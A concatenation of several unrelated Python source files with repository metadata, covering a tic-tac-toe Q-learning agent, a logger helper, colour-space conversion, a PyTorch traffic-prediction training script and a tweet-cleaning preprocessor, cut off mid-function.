df_6 = pd.DataFrame(list(perm(six_marks)))
df_6["reward_X"] = df_6.apply(self.initialize_reward, axis=1)
df_6 = df_6.loc[df_6["reward_X"] != 101].reset_index(
drop=True) # Remove all impossible cases identified in function initialize_ward
df_6["successor_X"] = df_6.apply(find_successor_X, axis=1)
df_6["successor_O"] = df_6.apply(find_successor_O, axis=1)
df_6["game_over"] = df_6["reward_X"] != 0
return df_6
def initializedf_5(self):
def find_successor_O(row):
df_6_states = self.df_6.drop(columns=["reward_X", "successor_X", "successor_O", "game_over"])
diff_count = (df_6_states != row.drop(["reward_X"])).sum(axis=1)
return diff_count.index[diff_count == 1].tolist()
five_marks = np.array([' ', ' ', ' ', ' ', 'X', 'X', 'X', 'O', 'O'])
df_5 = pd.DataFrame(list(perm(five_marks)))
df_5["reward_X"] = df_5.apply(self.initialize_reward, axis=1)
# Remove all impossible cases identified in function initialize_ward
df_5 = df_5.loc[df_5["reward_X"] != 101].reset_index(drop=True)
df_5["successor_O"] = df_5.apply(find_successor_O, axis=1)
df_5["game_over"] = df_5["reward_X"] != 0
return df_5
def initializedf_4(self):
def find_successor_X(row):
df_5_states = self.df_5.drop(columns=["reward_X", "successor_O", "game_over"])
diff_count = (df_5_states != row.drop(["reward_X"])).sum(axis=1)
return diff_count.index[diff_count == 1].tolist()
four_marks = np.array([' ', ' ', ' ', ' ', ' ', 'X', 'X', 'O', 'O'])
df_4 = pd.DataFrame(list(perm(four_marks)))
df_4["reward_X"] = 0 # Impossible to win with at most two marks for each player
df_4["successor_X"] = df_4.apply(find_successor_X, axis=1)
df_4["game_over"] = False # Impossible to have a game over state with first four hands
return df_4
def initializedf_3(self):
def find_successor_O(row):
df_4_states = self.df_4.drop(columns=["reward_X", "successor_X", "game_over"])
diff_count = (df_4_states != row.drop(["reward_X"])).sum(axis=1)
return diff_count.index[diff_count == 1].tolist()
three_marks = np.array([' ', ' ', ' ', ' ', ' ', ' ', 'X', 'X', 'O'])
df_3 = pd.DataFrame(list(perm(three_marks)))
df_3["reward_X"] = 0 # Impossible to win with at most two marks for each player
df_3["successor_O"] = df_3.apply(find_successor_O, axis=1)
df_3["game_over"] = False # Impossible to have a game over state with first three hands
return df_3
def initializedf_2(self):
def find_successor_X(row):
df_3_states = self.df_3.drop(columns=["reward_X", "successor_O", "game_over"])
diff_count = (df_3_states != row.drop(["reward_X"])).sum(axis=1)
return diff_count.index[diff_count == 1].tolist()
two_marks = np.array([' ', ' ', ' ', ' ', ' ', ' ', ' ', 'X', 'O'])
df_2 = pd.DataFrame(list(perm(two_marks)))
df_2["reward_X"] = 0 # Impossible to win with at most two marks for each player
df_2["successor_X"] = df_2.apply(find_successor_X, axis=1)
df_2["game_over"] = False # Impossible to have a game over state with first two hands
return df_2
def initializedf_1(self):
def find_successor_O(row):
df_2_states = self.df_2.drop(columns=["reward_X", "successor_X", "game_over"])
diff_count = (df_2_states != row.drop(["reward_X"])).sum(axis=1)
return diff_count.index[diff_count == 1].tolist()
one_marks = np.array([' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', 'X'])
df_1 = pd.DataFrame(list(perm(one_marks)))
df_1["reward_X"] = 0 # Impossible to win with at most two marks for each player
df_1["successor_O"] = df_1.apply(find_successor_O, axis=1)
df_1["game_over"] = False # Impossible to have a game over state with the first hand
return df_1
def initializedf_0(self):
def find_successor_X(row):
df_1_states = self.df_1.drop(columns=["reward_X", "successor_O", "game_over"])
diff_count = (df_1_states != row.drop(["reward_X"])).sum(axis=1)
return diff_count.index[diff_count == 1].tolist()
no_marks = np.array([' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '])
df_0 = pd.DataFrame(list(perm(no_marks)))
df_0["reward_X"] = 0 # Impossible to win with at most two marks for each player
df_0["successor_X"] = df_0.apply(find_successor_X, axis=1)
df_0["game_over"] = False # Impossible to have a game over state with no marks
return df_0
"""
Below is the methods for RL learning algorithm.
"""
def start_new_game(self):
successors = self.df_0.loc[0, "successor_X"]
options = self.df_1.loc[successors]
max_reward_X = options["reward_X"].max()
if (random() < self._epsilon) and (max_reward_X < self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == max_reward_X].sample(n=1).index
self.df_0.loc[0, "reward_X"] = (
self.df_0.loc[0, "reward_X"] +
self._alpha * (max_reward_X - self.df_0.loc[0, "reward_X"])
)
return decision[0]
def second_move(self, prev_decision):
successors = self.df_1.loc[prev_decision, "successor_O"]
options = self.df_2.loc[successors]
min_reward_X = options["reward_X"].min()
if (random() < self._epsilon) and (min_reward_X > -self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == min_reward_X].sample(n=1).index
self.df_1.loc[prev_decision, "reward_X"] = (
self.df_1.loc[prev_decision, "reward_X"] +
self._alpha * (min_reward_X - self.df_1.loc[prev_decision, "reward_X"])
)
return decision[0]
def third_move(self, prev_decision):
successors = self.df_2.loc[prev_decision, "successor_X"]
options = self.df_3.loc[successors]
max_reward_X = options["reward_X"].max()
if (random() < self._epsilon) and (max_reward_X < self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == max_reward_X].sample(n=1).index
self.df_2.loc[prev_decision, "reward_X"] = (
self.df_2.loc[prev_decision, "reward_X"] +
self._alpha * (max_reward_X - self.df_2.loc[prev_decision, "reward_X"])
)
return decision[0]
def fourth_move(self, prev_decision):
successors = self.df_3.loc[prev_decision, "successor_O"]
options = self.df_4.loc[successors]
min_reward_X = options["reward_X"].min()
if (random() < self._epsilon) and (min_reward_X > -self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == min_reward_X].sample(n=1).index
self.df_3.loc[prev_decision, "reward_X"] = (
self.df_3.loc[prev_decision, "reward_X"] +
self._alpha * (min_reward_X - self.df_3.loc[prev_decision, "reward_X"])
)
return decision[0]
def fifth_move(self, prev_decision):
successors = self.df_4.loc[prev_decision, "successor_X"]
options = self.df_5.loc[successors]
max_reward_X = options["reward_X"].max()
if (random() < self._epsilon) and (max_reward_X < self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == max_reward_X].sample(n=1).index
self.df_4.loc[prev_decision, "reward_X"] = (
self.df_4.loc[prev_decision, "reward_X"] +
self._alpha * (max_reward_X - self.df_4.loc[prev_decision, "reward_X"])
)
return decision[0]
def sixth_move(self, prev_decision):
successors = self.df_5.loc[prev_decision, "successor_O"]
options = self.df_6.loc[successors]
min_reward_X = options["reward_X"].min()
if (random() < self._epsilon) and (min_reward_X > -self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == min_reward_X].sample(n=1).index
self.df_5.loc[prev_decision, "reward_X"] = (
self.df_5.loc[prev_decision, "reward_X"] +
self._alpha * (min_reward_X - self.df_5.loc[prev_decision, "reward_X"])
)
return decision[0]
def further_move(self, prev_decision, cur_player):
if cur_player == "X":
successors = self.df_6.loc[prev_decision, "successor_X"]
options = self.df_6.loc[successors]
max_reward_X = options["reward_X"].max()
if (random() < self._epsilon) and (max_reward_X < self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == max_reward_X].sample(n=1).index
self.df_6.loc[prev_decision, "reward_X"] = (
self.df_6.loc[prev_decision, "reward_X"] +
self._alpha * (max_reward_X - self.df_6.loc[prev_decision, "reward_X"])
)
return decision[0]
else:
successors = self.df_6.loc[prev_decision, "successor_O"]
options = self.df_6.loc[successors]
min_reward_X = options["reward_X"].min()
if (random() < self._epsilon) and (min_reward_X > -self._consider_win): # Explore move
self._epsilon = max(self._epsilon - self._delta_epsilon, self._min_epsilon)
return options.sample(n=1).index[0]
else: # Exploit move
decision = options.loc[options["reward_X"] == min_reward_X].sample(n=1).index
self.df_6.loc[prev_decision, "reward_X"] = (
self.df_6.loc[prev_decision, "reward_X"] +
self._alpha * (min_reward_X - self.df_6.loc[prev_decision, "reward_X"])
)
return decision[0]
def is_game_over(self, df_num, row):
if df_num == 5:
return self.df_5.loc[row, "game_over"]
elif df_num == 6:
return self.df_6.loc[row, "game_over"]
else:
return False
def beautify_board(self, row):
output = row.loc[range(9)]
for box in range(9):
if output[box] == " ":
output[box] = "-" + str(box + 1) + "-"
else:
output[box] = " " + output[box] + " "
print(" —————————")
print("|", output[0], "|", output[1], "|", output[2], "|")
print(" —————————")
print("|", output[3], "|", output[4], "|", output[5], "|")
print(" —————————")
print("|", output[6], "|", output[7], "|", output[8], "|")
print(" —————————")
def display_board(self, df_num, row):
if df_num == 0:
self.beautify_board(self.df_0.loc[row])
elif df_num == 1:
self.beautify_board(self.df_1.loc[row])
elif df_num == 2:
self.beautify_board(self.df_2.loc[row])
elif df_num == 3:
self.beautify_board(self.df_3.loc[row])
elif df_num == 4:
self.beautify_board(self.df_4.loc[row])
elif df_num == 5:
self.beautify_board(self.df_5.loc[row])
else:
self.beautify_board(self.df_6.loc[row])
def save_dfs(self, database):
if not os.path.exists(database):
os.mkdir(database)
self.df_6.to_csv(database + "/df_6.csv", index=False)
self.df_5.to_csv(database + "/df_5.csv", index=False)
self.df_4.to_csv(database + "/df_4.csv", index=False)
self.df_3.to_csv(database + "/df_3.csv", index=False)
self.df_2.to_csv(database + "/df_2.csv", index=False)
self.df_1.to_csv(database + "/df_1.csv", index=False)
self.df_0.to_csv(database + "/df_0.csv", index=False)
def set_epsilon(self, epsilon):
self._epsilon = epsilon
def set_alpha(self, alpha):
self._alpha = alpha | [
"x1yan@ucsd.edu"
] | x1yan@ucsd.edu |
e4556c6f2d87cb3083924103d43c50bea57347a9 | ac2b5bfae8b755a85af1f969c575270c7f2a93ef | /EE-Book_tx/src/lib/wechat_parser/base.py | e21b61467d5598fb1a0b49d2a39865ff62ef94a4 | [
"MIT"
] | permissive | Crazyfit/taoguba_xueqiu_book | cae83a2ebcafb34b74d966f98078328066d8840b | 2603b992242a81981ef405cc4af20c63ce1d0b43 | refs/heads/master | 2022-02-11T03:23:08.449365 | 2019-07-04T11:13:05 | 2019-07-04T11:13:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | # -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
from src.lib.zhihu_parser.content.simple_answer import SimpleAnswer
from src.lib.zhihu_parser.content.simple_question import SimpleQuestion
from src.lib.wechat_parser.tools.parser_tools import ParserTools
class BaseParser(ParserTools):
def __init__(self, content):
self.dom = BeautifulSoup(content, 'html.parser')
| [
"macbookpro2100@qq.com"
] | macbookpro2100@qq.com |
6a5694ba9c9b4dbdd98396004240fcd5e7c8d65a | 45e7043b4285681782836461adf01673d018899a | /logger.py | 600c7be7acef5e95cf8089d973daac90b27df8f0 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | lanacioncom/books16 | 529ff825406bb6df16c1ef1889b1974313c0440f | a1f7b4759f267e1703b375b3a9e46fda398018f9 | refs/heads/master | 2020-05-23T10:22:49.746721 | 2019-04-25T18:05:47 | 2019-04-25T18:05:47 | 80,429,013 | 0 | 0 | MIT | 2019-01-07T20:57:40 | 2017-01-30T14:34:14 | JavaScript | UTF-8 | Python | false | false | 921 | py | import os
import app_config
import logging
from logging.handlers import RotatingFileHandler
LOG_FORMAT = '%(levelname)s:%(name)s:%(funcName)s(L%(lineno)d):%(asctime)s: %(message)s'
def get_logger(name=__name__, log_file_name=app_config.LOG_FILE_NAME):
folder_logs = 'logs'
file_path = os.path.join(folder_logs, log_file_name)
if not os.path.exists(folder_logs):
os.makedirs(folder_logs)
# logger = logging.getLogger(__name__)
logger = logging.getLogger(name)
logger.setLevel(app_config.LOG_LEVEL)
# create a file handler
handler = RotatingFileHandler(file_path, mode='a', maxBytes=2*1024*1024, backupCount=2, encoding=None, delay=0)
handler.setLevel(app_config.LOG_LEVEL)
# create a logging format
formatter = logging.Formatter(LOG_FORMAT)
handler.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(handler)
return logger
| [
"cristianbertelegni@gmail.com"
] | cristianbertelegni@gmail.com |
dba8ea53204e8b7fbcb0c3a367a17b3598e058e5 | 212202cdb2e034ff066fdafc7bd5eba1c44046e0 | /tools/convert.py | 9e46e3a7510fe1cc2f95e90e165e766d6b0eb5a8 | [] | no_license | vikiQiu/Distort-and-recover-tensorflow-py3 | 01d5cd67ac34de7584f2821e497d17ad6b7ee4e1 | 7b559fadf885aa8e26bac0714e157112ba3f6e4c | refs/heads/master | 2020-03-28T05:11:02.216045 | 2018-09-28T07:41:03 | 2018-09-28T07:41:03 | 147,761,036 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | py | import numpy as np
from scipy.misc import imread
import os,glob
def rgb2cmyk(rgb):
max_rgb = np.clip(np.amax(rgb,axis=2), 0.000001,1)
K = 1 - max_rgb
C = np.divide((max_rgb-rgb[:,:,0]), max_rgb)
M = np.divide((max_rgb-rgb[:,:,1]), max_rgb)
Y = np.divide((max_rgb-rgb[:,:,2]), max_rgb)
CMYK = np.stack([C,M,Y,K], axis=-1)
return CMYK
def cmyk2rgb(cmyk):
R = np.multiply((1 - cmyk[:,:,0]), (1 - cmyk[:,:,-1]))
G = np.multiply((1 - cmyk[:,:,1]), (1 - cmyk[:,:,-1]))
B = np.multiply((1 - cmyk[:,:,2]), (1 - cmyk[:,:,-1]))
RGB = np.stack([R,G,B], axis=-1)
return RGB
| [
"vikiqiu@hotmail.com"
] | vikiqiu@hotmail.com |
afec691f540c742d23f04dddec8bf6a673ca7277 | 0c890e921cebb24aa4ffe68d15f5bdb7d937931d | /lesson03/task_03_05.py | cb58a469bb52cb51ca7a410ba85558bfb711ef72 | [] | no_license | ishmatov/GeekBrains-PythonBasics | c8cb81fbacbbed7a1668728c9049160dad305c7d | 367ece0f99bfe9bce84961bee7e2cf7826285af7 | refs/heads/master | 2022-11-16T15:50:09.824945 | 2020-06-02T06:01:18 | 2020-06-02T06:01:18 | 267,243,344 | 0 | 0 | null | 2020-06-05T10:51:44 | 2020-05-27T06:51:51 | Python | UTF-8 | Python | false | false | 1,502 | py | """
5. Программа запрашивает у пользователя строку чисел, разделенных пробелом. При нажатии Enter должна выводиться сумма
чисел. Пользователь может продолжить ввод чисел, разделенных пробелом и снова нажать Enter. Сумма вновь введенных чисел
будет добавляться к уже подсчитанной сумме. Но если вместо числа вводится специальный символ, выполнение программы
завершается. Если специальный символ введен после нескольких чисел, то вначале нужно добавить сумму этих чисел к
полученной ранее сумме и после этого завершить программу.
"""
def sum_list(str_num):
global result
for el in str_num:
if el.isdigit():
result += int(el)
else:
if el == "#":
return False
return True
result = 0
while True:
str_num = list(input("Введите строку чисел через 'пробел', при вводе не числа программа или стоп символа '#' будет завершена: ").split())
if not sum_list(str_num):
print(result)
break
print(result)
| [
"ishmatov.rus@gmail.com"
] | ishmatov.rus@gmail.com |
cfe40a5dc8b0f534e15d8d6e43b436f9d632ba7e | 19fb5badd6180bb44f1c7a2fa2f1aef303a36c22 | /JSAC/FinalProject/sripts/ThreeCluster/ThreeSmall.py | 1bff2b6dc2e107af5b91b21869a9a05ad3d3b9f6 | [] | no_license | JessicaAndcode/STCNet | b747ed72c72a1bca300e69a56cb82956dcf58049 | c4f77fc887577cf92f0259c5ca9f2362c7cf9853 | refs/heads/master | 2022-03-23T15:07:19.914593 | 2019-12-29T11:32:46 | 2019-12-29T11:32:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,688 | py | # -*- coding: utf-8 -*-
"""
/*******************************************
** This is a file created by Chuanting Zhang
** Name: threecluster
** Date: 5/15/18
** Email: chuanting.zhang@gmail.com
** BSD license
********************************************/
"""
import os
import sys
import argparse
import numpy as np
from datetime import datetime
from sklearn import metrics
import matplotlib.pyplot as plt
import pandas as pd
import torch
from torch import nn
from torch import optim
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
from JSAC.FinalProject.utils.dataset import read_data
from JSAC.FinalProject.utils.model import DenseNet
torch.manual_seed(22)
device = torch.device("cuda")
parse = argparse.ArgumentParser()
parse.add_argument('-height', type=int, default=100)
parse.add_argument('-width', type=int, default=100)
parse.add_argument('-traffic', type=str, default='call')
parse.add_argument('-meta', type=int, default=0)
parse.add_argument('-cross', type=int, default=1)
parse.add_argument('-close_size', type=int, default=3)
parse.add_argument('-period_size', type=int, default=0)
parse.add_argument('-trend_size', type=int, default=0)
parse.add_argument('-test_size', type=int, default=24*7)
parse.add_argument('-nb_flow', type=int, default=1)
parse.add_argument('-cluster', type=int, default=3)
parse.add_argument('-fusion', type=int, default=1)
parse.add_argument('-transfer', type=int, default=0)
parse.add_argument('-crop', dest='crop', action='store_true')
parse.add_argument('-no-crop', dest='crop', action='store_false')
parse.set_defaults(crop=True)
parse.add_argument('-train', dest='train', action='store_true')
parse.add_argument('-no-train', dest='train', action='store_false')
parse.set_defaults(train=False)
parse.add_argument('-rows', nargs='+', type=int, default=[40, 60])
parse.add_argument('-cols', nargs='+', type=int, default=[40, 60])
parse.add_argument('-loss', type=str, default='l2', help='l1 | l2')
parse.add_argument('-lr', type=float, default=0.01)
parse.add_argument('-batch_size', type=int, default=32, help='batch size')
parse.add_argument('-epoch_size', type=int, default=500, help='epochs')
parse.add_argument('-test_row', type=int, default=10, help='test row')
parse.add_argument('-test_col', type=int, default=18, help='test col')
parse.add_argument('-save_dir', type=str, default='results')
opt = parse.parse_args()
print(opt)
opt.save_dir = '{}/{}'.format(opt.save_dir, opt.traffic)
def log(fname, s):
if not os.path.isdir(os.path.dirname(fname)):
os.system("mkdir -p " + os.path.dirname(fname))
f = open(fname, 'a')
f.write(str(datetime.now()) + ': ' + s + '\n')
f.close()
def train_epoch(data_type='train'):
total_loss = 0
if data_type == 'train':
model.train()
data = train_loader
if data_type == 'valid':
model.eval()
data = valid_loader
if (opt.close_size > 0) & (opt.meta == 1) & (opt.cross ==1):
for idx, (c, meta, cross, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
x = c.float().to(device)
meta = meta.float().to(device)
cross = cross.float().to(device)
target_var = target.float().to(device)
pred = model(x, meta=meta, cross=cross)
loss = criterion(pred, target_var)
total_loss += loss.item()
loss.backward()
optimizer.step()
elif (opt.close_size > 0) & (opt.meta == 1):
for idx, (x, meta, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
x = x.float().to(device)
meta = meta.float().to(device)
target_var = target.float().to(device)
pred = model(x, meta=meta)
loss = criterion(pred, target_var)
total_loss += loss.item()
loss.backward()
optimizer.step()
elif (opt.close_size > 0) & (opt.cross == 1):
for idx, (x, cross, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
x = x.float().to(device)
cross = cross.float().to(device)
target_var = target.float().to(device)
pred = model(x, cross=cross)
loss = criterion(pred, target_var)
total_loss += loss.item()
loss.backward()
optimizer.step()
elif opt.close_size > 0:
for idx, (c, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
x = c.float().to(device)
y = target.float().to(device)
pred = model(x)
loss = criterion(pred, y)
total_loss += loss.item()
loss.backward()
optimizer.step()
return total_loss
def train():
os.system("mkdir -p " + opt.save_dir)
best_valid_loss = 1.0
train_loss, valid_loss = [], []
for i in range(opt.epoch_size):
scheduler.step()
train_loss.append(train_epoch('train'))
valid_loss.append(train_epoch('valid'))
if valid_loss[-1] < best_valid_loss:
best_valid_loss = valid_loss[-1]
torch.save({'epoch': i, 'model': model, 'train_loss': train_loss,
'valid_loss': valid_loss}, opt.model_filename + '.model')
torch.save(optimizer, opt.model_filename + '.optim')
torch.save(model.state_dict(), opt.model_filename + '.pt')
log_string = ('iter: [{:d}/{:d}], train_loss: {:0.6f}, valid_loss: {:0.6f}, '
'best_valid_loss: {:0.6f}, lr: {:0.5f}').format((i + 1), opt.epoch_size,
train_loss[-1],
valid_loss[-1],
best_valid_loss,
opt.lr)
if i % 2 == 0:
print(log_string)
log(opt.model_filename + '.log', log_string)
def predict(test_type='train'):
predictions = []
ground_truth = []
loss = []
model.eval()
model.load_state_dict(torch.load(opt.model_filename + '.pt'))
# model.load_state_dict(torch.load('./results/call/base_200' + '.pt'))
if test_type == 'train':
data = train_loader
elif test_type == 'test':
data = test_loader
elif test_type == 'valid':
data = valid_loader
with torch.no_grad():
if (opt.close_size > 0) & (opt.meta == 1) & (opt.cross == 1):
for idx, (c, meta, cross, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
x = c.float().to(device)
meta = meta.float().to(device)
cross = cross.float().to(device)
# input_var = [_.float().to(device) for _ in [c, meta, cross]]
target_var = target.float().to(device)
pred = model(x, meta=meta, cross=cross)
predictions.append(pred.data.cpu())
ground_truth.append(target.data)
loss.append(criterion(pred, target_var).item())
elif (opt.close_size > 0) & (opt.meta == 1):
for idx, (x, meta, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
# input_var = [_.float() for _ in [c, meta]]
x = x.float().to(device)
meta = meta.float().to(device)
y = target.float().to(device)
pred = model(x, meta=meta)
predictions.append(pred.data.cpu())
ground_truth.append(target.data)
loss.append(criterion(pred, y).item())
elif (opt.close_size > 0) & (opt.cross == 1):
for idx, (x, cross, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
# input_var = [_.float() for _ in [c, meta]]
x = x.float().to(device)
cross = cross.float().to(device)
y = target.float().to(device)
pred = model(x, cross=cross)
predictions.append(pred.data.cpu())
ground_truth.append(target.data)
loss.append(criterion(pred, y).item())
elif opt.close_size > 0:
for idx, (c, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
x = c.float().to(device)
y = target.float().to(device)
pred = model(x)
predictions.append(pred.data.cpu())
ground_truth.append(target.data)
loss.append(criterion(pred, y).item())
final_predict = np.concatenate(predictions)
ground_truth = np.concatenate(ground_truth)
print(final_predict.shape, ground_truth.shape)
ground_truth = mmn.inverse_transform(ground_truth)
final_predict = mmn.inverse_transform(final_predict)
return final_predict, ground_truth
def train_valid_split(dataloader, test_size=0.2, shuffle=True, random_seed=0):
length = len(dataloader)
indices = list(range(0, length))
if shuffle:
np.random.seed(random_seed)
np.random.shuffle(indices)
if type(test_size) is float:
split = int(np.floor(test_size * length))
elif type(test_size) is int:
split = test_size
else:
raise ValueError('%s should be an int or float'.format(str))
return indices[split:], indices[:split]
if __name__ == '__main__':
path = '/home/dl/ct/data/all_data_ct.h5'
feature_path = '/home/dl/ct/data/crawled_feature.csv'
X, X_meta, X_cross, y, label, mmn = read_data(path, feature_path, opt)
# labels_df = pd.DataFrame(label + 1, columns=['cluster_label'])
# labels_df.to_csv('cluster_label_20.csv', index=False, header=0)
if opt.cluster > 1:
labels_df = pd.read_csv('cluster_label_20.csv', header=None)
labels_df.columns = ['cluster_label']
else:
labels_df = pd.DataFrame(np.ones(shape=(len(label),)), columns=['cluster_label'])
samples, sequences, channels, height, width = X.shape
x_train, x_test = X[:-opt.test_size], X[-opt.test_size:]
meta_train, meta_test = X_meta[:-opt.test_size], X_meta[-opt.test_size:]
cross_train, cross_test = X_cross[:-opt.test_size], X_cross[-opt.test_size:]
y_tr = y[:-opt.test_size]
y_te = y[-opt.test_size:]
prediction_ct = 0
truth_ct = 0
for cluster_id in (set(labels_df['cluster_label'].values)):
print('Cluster: %d' % cluster_id)
opt.model_filename = '{}/model={}lr={}-close={}-period=' \
'{}-meta={}-cross={}-crop={}-cluster={}'.format(opt.save_dir,
'densenet',
opt.lr,
opt.close_size,
opt.period_size,
opt.meta,
opt.cross, opt.crop, cluster_id)
print('Saving to ' + opt.model_filename)
labels_df['cur_label'] = 0
labels_df['cur_label'][labels_df['cluster_label'] == int(cluster_id)] = 1
cell_idx = labels_df['cur_label'] == 1
cell_idx = np.reshape(cell_idx, (height, width))
y_train = y_tr * cell_idx
y_test = y_te * cell_idx
if (opt.meta == 1) & (opt.cross == 1):
train_data = list(zip(*[x_train, meta_train, cross_train, y_train]))
test_data = list(zip(*[x_test, meta_test, cross_test, y_test]))
elif (opt.meta == 1) & (opt.cross == 0):
train_data = list(zip(*[x_train, meta_train, y_train]))
test_data = list(zip(*[x_test, meta_test, y_test]))
elif (opt.cross == 1) & (opt.meta == 0):
train_data = list(zip(*[x_train, cross_train, y_train]))
test_data = list(zip(*[x_test, cross_test, y_test]))
elif (opt.meta == 0) & (opt.cross == 0):
train_data = list(zip(*[x_train, y_train]))
test_data = list(zip(*[x_test, y_test]))
print(len(train_data), len(test_data))
# split the training data into train and validation
train_idx, valid_idx = train_valid_split(train_data, 0.1)
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
train_loader = DataLoader(train_data, batch_size=opt.batch_size, sampler=train_sampler,
num_workers=8, pin_memory=True)
valid_loader = DataLoader(train_data, batch_size=opt.batch_size, sampler=valid_sampler,
num_workers=2, pin_memory=True)
test_loader = DataLoader(test_data, batch_size=opt.batch_size, shuffle=False)
input_shape = X.shape
meta_shape = X_meta.shape
cross_shape = X_cross.shape
model = DenseNet(input_shape, meta_shape,
cross_shape, nb_flows=opt.nb_flow,
fusion=opt.fusion, maps=(opt.meta+opt.cross+1)).to(device)
if opt.train:
if cluster_id > 1:
model_name = '{}/model={}lr={}-close={}-period=' \
'{}-meta={}-cross={}-crop={}-cluster={}'.format(opt.save_dir,
'densenet',
opt.lr,
opt.close_size,
opt.period_size,
opt.meta,
opt.cross, opt.crop, cluster_id - 1)
model.load_state_dict(torch.load(model_name + '.pt'))
if opt.transfer == 1:
if opt.traffic == 'sms':
model.load_state_dict(torch.load('./results/call/call_base2.pt'))
elif opt.traffic == 'call':
model.load_state_dict(torch.load('./results/sms/sms_base2.pt'))
optimizer = optim.Adam(model.parameters(), opt.lr)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,
milestones=[0.5 * opt.epoch_size,
0.75 * opt.epoch_size],
gamma=0.1)
if not os.path.exists(opt.save_dir):
os.makedirs(opt.save_dir)
if not os.path.isdir(opt.save_dir):
raise Exception('%s is not a dir' % opt.save_dir)
if opt.loss == 'l1':
criterion = nn.L1Loss().cuda()
elif opt.loss == 'l2':
criterion = nn.MSELoss().cuda()
print('Training...')
log(opt.model_filename + '.log', '[training]')
if opt.train:
train()
pred, truth = predict('test')
prediction_ct += pred * cell_idx
truth_ct += truth * cell_idx
# 2018-04-20 in_error and out_error
if opt.traffic != 'internet':
prediction_ct[-24] = (((truth_ct[-25] + truth_ct[-26] + truth_ct[-27]) / 3)* 2.5)
# prediction_ct[-24] = truth_ct[-25] * 2
# plt.plot(prediction_ct[:, 0, opt.test_row, opt.test_col], 'r-', label='prediction')
# plt.plot(truth_ct[:, 0, opt.test_row, opt.test_col], 'k-', label='truth')
# plt.legend()
# plt.show()
if opt.nb_flow > 1:
print(
'Final RMSE:{:0.5f}'.format(
metrics.mean_squared_error(prediction_ct.ravel(), truth_ct.ravel()) ** 0.5))
pred_in, pred_out = prediction_ct[:, 0], prediction_ct[:, 1]
truth_in, truth_out = truth_ct[:, 0], truth_ct[:, 1]
print('In traffic RMSE:{:0.5f}'.format(
metrics.mean_squared_error(pred_in.ravel(), truth_in.ravel()) ** 0.5))
print('Out traffic RMSE:{:0.5f}'.format(
metrics.mean_squared_error(pred_out.ravel(), truth_out.ravel()) ** 0.5))
else:
print('Final RMSE:{:0.5f}'.format(
metrics.mean_squared_error(prediction_ct.ravel(), truth_ct.ravel()) ** 0.5)) | [
"noreply@github.com"
] | JessicaAndcode.noreply@github.com |
e05fbbc428978050d937f54e0af1fce076af5ff7 | 93f0b1e11f73fcf6146503dc65e9056bf2a9cb12 | /dataset2/clean_data2.py | 8308be276c768bcdd46d43948acfdae0b3d94c98 | [] | no_license | alcina-sharon/Twitter-Sentiment-Analysis | e283a076ad21ed9075b8786e286dc1cfca5d8689 | d9aa15a14bbc6573af81b0acaed612e151760b49 | refs/heads/master | 2020-04-17T13:53:08.552245 | 2019-01-20T07:43:36 | 2019-01-20T07:43:36 | 166,634,243 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,026 | py | import pandas as pd
import numpy as np
import nltk
import re
from nltk.corpus import stopwords
from nltk.corpus import wordnet
import wordninja
from autocorrect import spell
"""spelling mistake
abbreviate shortforms"""
en_stops = set(stopwords.words('english'))
data_train = pd.read_csv("hatespeech.csv")
#print (data_train.shape)
data_test = pd.read_csv("train_tweets2.csv")
#print (data_test.shape)
data = data_train.append(data_test, ignore_index=True)
#print (data.shape)
#abb = set()
abb = list()
#removes @user
def remove(pattern,tweet):
txt = re.findall(pattern,tweet)
for i in txt:
tweet = re.sub(i,'',tweet)
return tweet
#"#MeToo" is separated into Me Too
def separate(tweet):
txt = re.findall("#[\w]*",tweet)
for i in txt:
if any(x.isupper() for x in i):#true if capital letter is present
tweet = re.sub(i," ".join(re.findall("[A-Z][^A-Z]*",i)),tweet)
tweet = tweet.replace("#", "")
return tweet
#removes stop words like "in ,is ,the , a ,an...."
def stopwords(tweet):
sentence = ''
all_words = tweet.split()
for word in all_words:
if word not in en_stops:
sentence = sentence+" "+word
return (sentence)
def check(tweet):
tweet_tokenized = tweet.split()
for i in tweet_tokenized:
if not wordnet.synsets(i):
word_to_be_replaced = ""
split_word_i = wordninja.split(i)
